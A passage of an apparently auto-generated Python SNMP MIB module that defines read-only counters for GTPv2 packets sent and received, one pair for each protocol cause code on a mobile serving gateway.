if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsInvLenRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsInvLenRx.setDescription('Number of GTPV2 packets received with cause Invalid Length.')
jnxMbgSgwPPGtpV2ICsInvLenTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 107), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsInvLenTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsInvLenTx.setDescription('Number of GTP packets sent with cause Invalid Length.')
jnxMbgSgwPPGtpV2ICsServNotSupRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 108), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsServNotSupRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsServNotSupRx.setDescription('Number of GTPV2 packets received with cause Service Not supported.')
jnxMbgSgwPPGtpV2ICsServNotSupTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 109), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsServNotSupTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsServNotSupTx.setDescription('Number of GTP packets sent with cause Service Not supported.')
jnxMbgSgwPPGtpV2ICsManIEIncorRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 110), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsManIEIncorRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsManIEIncorRx.setDescription('Number of GTPV2 packets received with cause Mandatory IE incorrect.')
jnxMbgSgwPPGtpV2ICsManIEIncorTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 111), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsManIEIncorTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsManIEIncorTx.setDescription('Number of GTP packets sent with cause Mandatory IE incorrect.')
jnxMbgSgwPPGtpV2ICsManIEMissRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 112), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsManIEMissRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsManIEMissRx.setDescription('Number of GTPV2 packets received with cause Mandatory IE Missing.')
jnxMbgSgwPPGtpV2ICsManIEMissTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 113), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsManIEMissTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsManIEMissTx.setDescription('Number of GTP packets sent with cause Mandatory IE Missing.')
jnxMbgSgwPPGtpV2ICsOptIEIncorRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 114), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsOptIEIncorRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsOptIEIncorRx.setDescription('Number of GTPV2 packets received with cause Optional IE Incorrect.')
jnxMbgSgwPPGtpV2ICsOptIEIncorTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 115), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsOptIEIncorTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsOptIEIncorTx.setDescription('Number of GTP packets sent with cause Optional IE Incorrect.')
jnxMbgSgwPPGtpV2ICsSysFailRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 116), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsSysFailRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsSysFailRx.setDescription('Number of GTPV2 packets received with cause System Failure.')
jnxMbgSgwPPGtpV2ICsSysFailTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 117), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsSysFailTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsSysFailTx.setDescription('Number of GTP packets sent with cause System Failure.')
jnxMbgSgwPPGtpV2ICsNoResRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 118), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsNoResRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsNoResRx.setDescription('Number of GTPV2 packets received with cause No Resource.')
jnxMbgSgwPPGtpV2ICsNoResTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 119), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsNoResTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsNoResTx.setDescription('Number of GTP packets sent with cause No Resource.')
jnxMbgSgwPPGtpV2ICsTFTSMANTErRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 120), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsTFTSMANTErRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsTFTSMANTErRx.setDescription('Number of GTPV2 packets received with cause TFT Symantic Error.')
jnxMbgSgwPPGtpV2ICsTFTSMANTErTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 121), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsTFTSMANTErTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsTFTSMANTErTx.setDescription('Number of GTP packets sent with cause TFT Symantic Error.')
jnxMbgSgwPPGtpV2ICsTFTSysErrRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 122), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsTFTSysErrRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsTFTSysErrRx.setDescription('Number of GTPV2 packets received with cause TFT System Error.')
jnxMbgSgwPPGtpV2ICsTFTSysErrTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 123), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsTFTSysErrTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsTFTSysErrTx.setDescription('Number of GTP packets sent with cause TFT System Error.')
jnxMbgSgwPPGtpV2ICsPkFltManErRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 124), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsPkFltManErRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsPkFltManErRx.setDescription('Number of GTPV2 packets received with cause Packet Filter Symantic Error.')
jnxMbgSgwPPGtpV2ICsPkFltManErTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 125), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsPkFltManErTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsPkFltManErTx.setDescription('Number of GTP packets sent with cause Packet Filter Symantic Error.')
jnxMbgSgwPPGtpV2ICsPkFltSynErRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 126), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsPkFltSynErRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsPkFltSynErRx.setDescription('Number of GTPV2 packets received with cause Packet Filter Syntax Error.')
jnxMbgSgwPPGtpV2ICsPkFltSynErTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 127), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsPkFltSynErTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsPkFltSynErTx.setDescription('Number of GTP packets sent with cause Packet Filter Syntax Error.')
jnxMbgSgwPPGtpV2ICsMisUnknAPNRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 128), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsMisUnknAPNRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsMisUnknAPNRx.setDescription('Number of GTPV2 packets received with cause Unknown APN.')
jnxMbgSgwPPGtpV2ICsMisUnknAPNTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 129), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsMisUnknAPNTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsMisUnknAPNTx.setDescription('Number of GTP packets sent with cause Unknown APN.')
jnxMbgSgwPPGtpV2ICsUnexpRptIERx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 130), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsUnexpRptIERx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsUnexpRptIERx.setDescription('Number of GTPV2 packets received with cause Unexpected Repeated IE.')
jnxMbgSgwPPGtpV2ICsUnexpRptIETx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 131), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsUnexpRptIETx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsUnexpRptIETx.setDescription('Number of GTP packets sent with cause Unexpected Repeated IE.')
jnxMbgSgwPPGtpV2ICsGREKeyNtFdRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 132), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsGREKeyNtFdRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsGREKeyNtFdRx.setDescription('Number of GTPV2 packets received with cause GRE Key Not Found.')
jnxMbgSgwPPGtpV2ICsGREKeyNtFdTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 133), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsGREKeyNtFdTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsGREKeyNtFdTx.setDescription('Number of GTP packets sent with cause GRE Key Not Found.')
jnxMbgSgwPPGtpV2ICsRelocFailRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 134), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsRelocFailRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsRelocFailRx.setDescription('Number of GTPV2 packets received with cause Relocation Failed.')
jnxMbgSgwPPGtpV2ICsRelocFailTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 135), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsRelocFailTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsRelocFailTx.setDescription('Number of GTP packets sent with cause Relocation Failed.')
jnxMbgSgwPPGtpV2ICsDenINRatRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 136), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsDenINRatRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsDenINRatRx.setDescription('Number of GTPV2 packets received with cause Denied in RAT.')
jnxMbgSgwPPGtpV2ICsDenINRatTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 137), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsDenINRatTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsDenINRatTx.setDescription('Number of GTP packets sent with cause Denied in RAT.')
jnxMbgSgwPPGtpV2ICsPTNotSuppRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 138), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsPTNotSuppRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsPTNotSuppRx.setDescription('Number of GTPV2 packets received with cause PDN Type Not Supported.')
jnxMbgSgwPPGtpV2ICsPTNotSuppTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 139), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsPTNotSuppTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsPTNotSuppTx.setDescription('Number of GTP packets sent with cause PDN Type Not Supported.')
jnxMbgSgwPPGtpV2ICsAllDynAdOcRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 140), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsAllDynAdOcRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsAllDynAdOcRx.setDescription('Number of GTPV2 packets received with cause Allocated Dynamic Address Occupied.')
jnxMbgSgwPPGtpV2ICsAllDynAdOcTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 141), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsAllDynAdOcTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsAllDynAdOcTx.setDescription('Number of GTP packets sent with cause Allocated Dynamic Address Occupied.')
jnxMbgSgwPPGtpV2ICsNOTFTUECTXRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 142), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsNOTFTUECTXRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsNOTFTUECTXRx.setDescription('Number of GTPV2 packets received with cause UE Context Without TFT Exists.')
jnxMbgSgwPPGtpV2ICsNOTFTUECTXTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 143), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsNOTFTUECTXTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsNOTFTUECTXTx.setDescription('Number of GTP packets sent with cause UE Context Without TFT Exists.')
jnxMbgSgwPPGtpV2ICsProtoNtSupRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 144), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsProtoNtSupRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsProtoNtSupRx.setDescription('Number of GTPV2 packets received with cause Protocol Not Supported.')
jnxMbgSgwPPGtpV2ICsProtoNtSupTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 145), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsProtoNtSupTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsProtoNtSupTx.setDescription('Number of GTP packets sent with cause Protocol Not Supported.')
jnxMbgSgwPPGtpV2ICsUENotRespRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 146), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsUENotRespRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsUENotRespRx.setDescription('Number of GTPV2 packets received with cause UE Not Responding.')
jnxMbgSgwPPGtpV2ICsUENotRespTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 147), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsUENotRespTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsUENotRespTx.setDescription('Number of GTP packets sent with cause UE Not Responding.')
jnxMbgSgwPPGtpV2ICsUERefusesRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 148), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsUERefusesRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsUERefusesRx.setDescription('Number of GTPV2 packets received with cause UE Refuses.')
jnxMbgSgwPPGtpV2ICsUERefusesTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 149), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsUERefusesTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsUERefusesTx.setDescription('Number of GTP packets sent with cause UE Refuses.')
jnxMbgSgwPPGtpV2ICsServDeniedRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 150), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsServDeniedRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsServDeniedRx.setDescription('Number of GTPV2 packets received with cause Service Denied.')
jnxMbgSgwPPGtpV2ICsServDeniedTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 151), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsServDeniedTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsServDeniedTx.setDescription('Number of GTP packets sent with cause Service Denied.')
jnxMbgSgwPPGtpV2ICsUnabPageUERx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 152), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsUnabPageUERx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsUnabPageUERx.setDescription('Number of GTPV2 packets received with cause Unable to Page UE.')
jnxMbgSgwPPGtpV2ICsUnabPageUETx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 153), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsUnabPageUETx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsUnabPageUETx.setDescription('Number of GTP packets sent with cause Unable to Page UE.')
jnxMbgSgwPPGtpV2ICsNoMemRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 154), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsNoMemRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsNoMemRx.setDescription('Number of GTPV2 packets received with cause No Memory.')
jnxMbgSgwPPGtpV2ICsNoMemTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 155), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsNoMemTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsNoMemTx.setDescription('Number of GTP packets sent with cause No Memory.')
jnxMbgSgwPPGtpV2ICsUserAUTHFlRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 156), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsUserAUTHFlRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsUserAUTHFlRx.setDescription('Number of GTPV2 packets received with cause User AUTH Failed.')
jnxMbgSgwPPGtpV2ICsUserAUTHFlTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 157), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsUserAUTHFlTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsUserAUTHFlTx.setDescription('Number of GTP packets sent with cause User AUTH Failed.')
jnxMbgSgwPPGtpV2ICsAPNAcsDenRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 158), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsAPNAcsDenRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsAPNAcsDenRx.setDescription('Number of GTPV2 packets received with cause APN Access Denied.')
jnxMbgSgwPPGtpV2ICsAPNAcsDenTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 159), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsAPNAcsDenTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsAPNAcsDenTx.setDescription('Number of GTP packets sent with cause APN Access Denied.')
jnxMbgSgwPPGtpV2ICsReqRejRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 160), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsReqRejRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsReqRejRx.setDescription('Number of GTPV2 packets received with cause Request Rejected.')
jnxMbgSgwPPGtpV2ICsReqRejTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 161), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsReqRejTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsReqRejTx.setDescription('Number of GTP packets sent with cause Request Rejected.')
jnxMbgSgwPPGtpV2ICsPTMSISigMMRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 162), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsPTMSISigMMRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsPTMSISigMMRx.setDescription('Number of GTPV2 packets received with cause P-TMSI Signature Mismatch.')
jnxMbgSgwPPGtpV2ICsPTMSISigMMTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 163), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsPTMSISigMMTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsPTMSISigMMTx.setDescription('Number of GTP packets sent with cause P-TMSI Signature Mismatch.')
jnxMbgSgwPPGtpV2ICsIMSINotKnRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 164), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsIMSINotKnRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsIMSINotKnRx.setDescription('Number of GTPV2 packets received with cause IMSI Not Known.')
jnxMbgSgwPPGtpV2ICsIMSINotKnTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 165), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsIMSINotKnTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsIMSINotKnTx.setDescription('Number of GTP packets sent with cause IMSI Not Known.')
jnxMbgSgwPPGtpV2ICsCondIEMsRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 166), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsCondIEMsRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsCondIEMsRx.setDescription('Number of GTPV2 packets received with cause Conditional IE Missing.')
jnxMbgSgwPPGtpV2ICsCondIEMsTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 167), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsCondIEMsTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsCondIEMsTx.setDescription('Number of GTP packets sent with cause Conditional IE Missing.')
jnxMbgSgwPPGtpV2ICsAPNResTIncRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 168), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsAPNResTIncRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsAPNResTIncRx.setDescription('Number of GTPV2 packets received with cause APN Restriction Type Incompatible.')
jnxMbgSgwPPGtpV2ICsAPNResTIncTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 169), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsAPNResTIncTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsAPNResTIncTx.setDescription('Number of GTP packets sent with cause APN Restriction Type Incompatible.')
jnxMbgSgwPPGtpV2ICsUnknownRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 170), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsUnknownRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsUnknownRx.setDescription('Number of GTPV2 packets received with cause Unknown.')
jnxMbgSgwPPGtpV2ICsUnknownTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 171), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsUnknownTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsUnknownTx.setDescription('Number of GTP packets sent with cause Unknown.')
jnxMbgSgwPPGtpV2ICsLclDetRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 172), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsLclDetRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsLclDetRx.setDescription('Number of GTP packets received with cause Local Detach.')
jnxMbgSgwPPGtpV2ICsLclDetTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 173), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsLclDetTx.setStatus('current')
